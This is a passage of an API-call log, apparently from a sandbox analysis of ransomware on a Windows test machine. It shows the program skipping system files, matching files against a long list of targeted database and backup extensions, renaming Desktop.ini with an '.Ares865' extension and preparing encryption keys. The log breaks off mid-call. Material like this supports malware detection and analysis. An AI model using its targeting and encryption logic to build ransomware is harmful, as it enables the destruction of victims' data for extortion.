ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.325] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.325] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.325] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.325] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d0ebd60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.325] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.325] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.325] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.325] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.325] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x7e05e94e, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="bootmgr") returned 1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="temp") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="pagefile.sys") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="boot") returned 1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="ids.txt") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="ntuser.dat") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0092.325] lstrcmpiW (lpString1="Desktop.ini", lpString2="MSBuild") returned -1 [0092.325] lstrlenW (lpString="Desktop.ini") returned 11 [0092.325] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\*") returned 63 [0092.325] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Desktop.ini" | out: lpString1="Desktop.ini") returned="Desktop.ini" [0092.326] lstrlenW (lpString="Desktop.ini") returned 11 [0092.326] lstrlenW (lpString="Ares865") returned 7 [0092.326] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.326] lstrlenW (lpString=".dll") returned 4 [0092.326] lstrcmpiW (lpString1="Desktop.ini", lpString2=".dll") returned 1 [0092.326] lstrlenW (lpString=".lnk") returned 4 [0092.326] lstrcmpiW (lpString1="Desktop.ini", lpString2=".lnk") returned 1 [0092.326] lstrlenW (lpString=".ini") returned 4 [0092.326] lstrcmpiW (lpString1="Desktop.ini", lpString2=".ini") returned 1 [0092.326] lstrlenW (lpString=".sys") returned 4 [0092.326] lstrcmpiW (lpString1="Desktop.ini", lpString2=".sys") returned 1 [0092.326] lstrlenW (lpString="Desktop.ini") returned 11 [0092.326] lstrlenW (lpString="bak") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.326] lstrlenW (lpString="ba_") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.326] lstrlenW (lpString="dbb") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.326] lstrlenW (lpString="vmdk") returned 4 [0092.326] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.326] lstrlenW (lpString="rar") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.326] lstrlenW (lpString="zip") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.326] lstrlenW (lpString="tgz") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.326] lstrlenW (lpString="vbox") returned 4 [0092.326] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.326] lstrlenW (lpString="vdi") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.326] lstrlenW (lpString="vhd") returned 3 [0092.326] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.326] lstrlenW (lpString="vhdx") returned 4 [0092.326] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.326] lstrlenW (lpString="avhd") returned 4 [0092.326] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.327] lstrlenW (lpString="db") returned 2 [0092.327] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.327] lstrlenW (lpString="db2") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.327] lstrlenW (lpString="db3") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.327] lstrlenW (lpString="dbf") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.327] lstrlenW (lpString="mdf") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.327] lstrlenW (lpString="mdb") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.327] lstrlenW (lpString="sql") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.327] lstrlenW (lpString="sqlite") returned 6 [0092.327] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.327] lstrlenW (lpString="sqlite3") returned 7 [0092.327] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.327] lstrlenW (lpString="sqlitedb") returned 8 [0092.327] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.327] lstrlenW (lpString="xml") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.327] lstrlenW (lpString="$er") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.327] lstrlenW (lpString="4dd") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.327] lstrlenW (lpString="4dl") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.327] lstrlenW (lpString="^^^") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.327] lstrlenW (lpString="abs") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.327] lstrlenW (lpString="abx") returned 3 [0092.327] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.327] lstrlenW (lpString="accdb") returned 5 [0092.327] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.327] lstrlenW (lpString="accdc") returned 5 [0092.328] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.328] lstrlenW (lpString="accde") returned 5 [0092.328] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.328] lstrlenW (lpString="accdr") returned 5 [0092.328] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.328] lstrlenW (lpString="accdt") returned 5 [0092.328] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.328] lstrlenW (lpString="accdw") returned 5 [0092.328] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.328] lstrlenW (lpString="accft") returned 5 [0092.328] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.328] lstrlenW (lpString="adb") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.328] lstrlenW (lpString="adb") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.328] lstrlenW (lpString="ade") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.328] lstrlenW (lpString="adf") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.328] lstrlenW (lpString="adn") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.328] lstrlenW (lpString="adp") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.328] lstrlenW (lpString="alf") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.328] lstrlenW (lpString="ask") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.328] lstrlenW (lpString="btr") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.328] lstrlenW (lpString="cat") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.328] lstrlenW (lpString="cdb") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.328] lstrlenW (lpString="ckp") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.328] lstrlenW (lpString="cma") returned 3 [0092.328] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.329] lstrlenW (lpString="cpd") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.329] lstrlenW (lpString="dacpac") returned 6 [0092.329] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.329] lstrlenW (lpString="dad") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.329] lstrlenW (lpString="dadiagrams") returned 10 [0092.329] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.329] lstrlenW (lpString="daschema") returned 8 [0092.329] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.329] lstrlenW (lpString="db-journal") returned 10 [0092.329] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.329] lstrlenW (lpString="db-shm") returned 6 [0092.329] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.329] lstrlenW (lpString="db-wal") returned 6 [0092.329] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.329] lstrlenW (lpString="dbc") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.329] lstrlenW (lpString="dbs") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.329] lstrlenW (lpString="dbt") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.329] lstrlenW (lpString="dbv") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.329] lstrlenW (lpString="dbx") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.329] lstrlenW (lpString="dcb") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.329] lstrlenW (lpString="dct") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.329] lstrlenW (lpString="dcx") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.329] lstrlenW (lpString="ddl") returned 3 [0092.329] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.329] lstrlenW (lpString="dlis") returned 4 [0092.329] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.329] lstrlenW (lpString="dp1") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.330] lstrlenW (lpString="dqy") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.330] lstrlenW (lpString="dsk") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.330] lstrlenW (lpString="dsn") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.330] lstrlenW (lpString="dtsx") returned 4 [0092.330] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.330] lstrlenW (lpString="dxl") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.330] lstrlenW (lpString="eco") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.330] lstrlenW (lpString="ecx") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.330] lstrlenW (lpString="edb") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.330] lstrlenW (lpString="epim") returned 4 [0092.330] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.330] lstrlenW (lpString="fcd") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.330] lstrlenW (lpString="fdb") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.330] lstrlenW (lpString="fic") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.330] lstrlenW (lpString="flexolibrary") returned 12 [0092.330] lstrlenW (lpString="fm5") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.330] lstrlenW (lpString="fmp") returned 3 [0092.330] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.330] lstrlenW (lpString="fmp12") returned 5 [0092.330] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.330] lstrlenW (lpString="fmpsl") returned 5 [0092.331] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.331] lstrlenW (lpString="fol") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.331] lstrlenW (lpString="fp3") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.331] lstrlenW (lpString="fp4") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.331] lstrlenW (lpString="fp5") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.331] lstrlenW (lpString="fp7") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.331] lstrlenW (lpString="fpt") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.331] lstrlenW (lpString="frm") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.331] lstrlenW (lpString="gdb") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.331] lstrlenW (lpString="gdb") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.331] lstrlenW (lpString="grdb") returned 4 [0092.331] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.331] lstrlenW (lpString="gwi") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.331] lstrlenW (lpString="hdb") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.331] lstrlenW (lpString="his") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.331] lstrlenW (lpString="ib") returned 2 [0092.331] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.331] lstrlenW (lpString="idb") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.331] lstrlenW (lpString="ihx") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.331] lstrlenW (lpString="itdb") returned 4 [0092.331] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.331] lstrlenW (lpString="itw") returned 3 [0092.331] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.332] lstrlenW (lpString="jet") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.332] lstrlenW (lpString="jtx") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.332] lstrlenW (lpString="kdb") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.332] lstrlenW (lpString="kexi") returned 4 [0092.332] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.332] lstrlenW (lpString="kexic") returned 5 [0092.332] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.332] lstrlenW (lpString="kexis") returned 5 [0092.332] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.332] lstrlenW (lpString="lgc") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.332] lstrlenW (lpString="lwx") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.332] lstrlenW (lpString="maf") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.332] lstrlenW (lpString="maq") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.332] lstrlenW (lpString="mar") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.332] lstrlenW (lpString="marshal") returned 7 [0092.332] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.332] lstrlenW (lpString="mas") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.332] lstrlenW (lpString="mav") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.332] lstrlenW (lpString="maw") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.332] lstrlenW (lpString="mdbhtml") returned 7 [0092.332] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.332] lstrlenW (lpString="mdn") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.332] lstrlenW (lpString="mdt") returned 3 [0092.332] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.332] lstrlenW (lpString="mfd") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.333] lstrlenW (lpString="mpd") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.333] lstrlenW (lpString="mrg") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.333] lstrlenW (lpString="mud") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.333] lstrlenW (lpString="mwb") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.333] lstrlenW (lpString="myd") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.333] lstrlenW (lpString="ndf") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.333] lstrlenW (lpString="nnt") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.333] lstrlenW (lpString="nrmlib") returned 6 [0092.333] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.333] lstrlenW (lpString="ns2") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.333] lstrlenW (lpString="ns3") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.333] lstrlenW (lpString="ns4") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.333] lstrlenW (lpString="nsf") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.333] lstrlenW (lpString="nv") returned 2 [0092.333] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.333] lstrlenW (lpString="nv2") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.333] lstrlenW (lpString="nwdb") returned 4 [0092.333] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.333] lstrlenW (lpString="nyf") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.333] lstrlenW (lpString="odb") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.333] lstrlenW (lpString="odb") returned 3 [0092.333] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.334] lstrlenW (lpString="oqy") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.334] lstrlenW (lpString="ora") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.334] lstrlenW (lpString="orx") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.334] lstrlenW (lpString="owc") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.334] lstrlenW (lpString="p96") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.334] lstrlenW (lpString="p97") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.334] lstrlenW (lpString="pan") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.334] lstrlenW (lpString="pdb") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.334] lstrlenW (lpString="pdm") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.334] lstrlenW (lpString="pnz") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.334] lstrlenW (lpString="qry") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.334] lstrlenW (lpString="qvd") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.334] lstrlenW (lpString="rbf") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.334] lstrlenW (lpString="rctd") returned 4 [0092.334] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.334] lstrlenW (lpString="rod") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.334] lstrlenW (lpString="rodx") returned 4 [0092.334] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.334] lstrlenW (lpString="rpd") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.334] lstrlenW (lpString="rsd") returned 3 [0092.334] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.334] lstrlenW (lpString="sas7bdat") returned 8 [0092.335] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.335] lstrlenW (lpString="sbf") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.335] lstrlenW (lpString="scx") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.335] lstrlenW (lpString="sdb") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.335] lstrlenW (lpString="sdc") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.335] lstrlenW (lpString="sdf") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.335] lstrlenW (lpString="sis") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.335] lstrlenW (lpString="spq") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.335] lstrlenW (lpString="te") returned 2 [0092.335] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.335] lstrlenW (lpString="teacher") returned 7 [0092.335] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.335] lstrlenW (lpString="tmd") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.335] lstrlenW (lpString="tps") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.335] lstrlenW (lpString="trc") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.335] lstrlenW (lpString="trc") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.335] lstrlenW (lpString="trm") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.335] lstrlenW (lpString="udb") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.335] lstrlenW (lpString="udl") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.335] lstrlenW (lpString="usr") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.335] lstrlenW (lpString="v12") returned 3 [0092.335] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.336] lstrlenW (lpString="vis") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.336] lstrlenW (lpString="vpd") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.336] lstrlenW (lpString="vvv") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.336] lstrlenW (lpString="wdb") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.336] lstrlenW (lpString="wmdb") returned 4 [0092.336] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.336] lstrlenW (lpString="wrk") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.336] lstrlenW (lpString="xdb") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.336] lstrlenW (lpString="xld") returned 3 [0092.336] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.336] lstrlenW (lpString="xmlff") returned 5 [0092.336] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.336] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865") returned 81 [0092.336] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.340] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=318) returned 1 [0092.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.340] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0092.340] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0092.341] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.341] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.341] CreateFileMappingW (hFile=0x118, 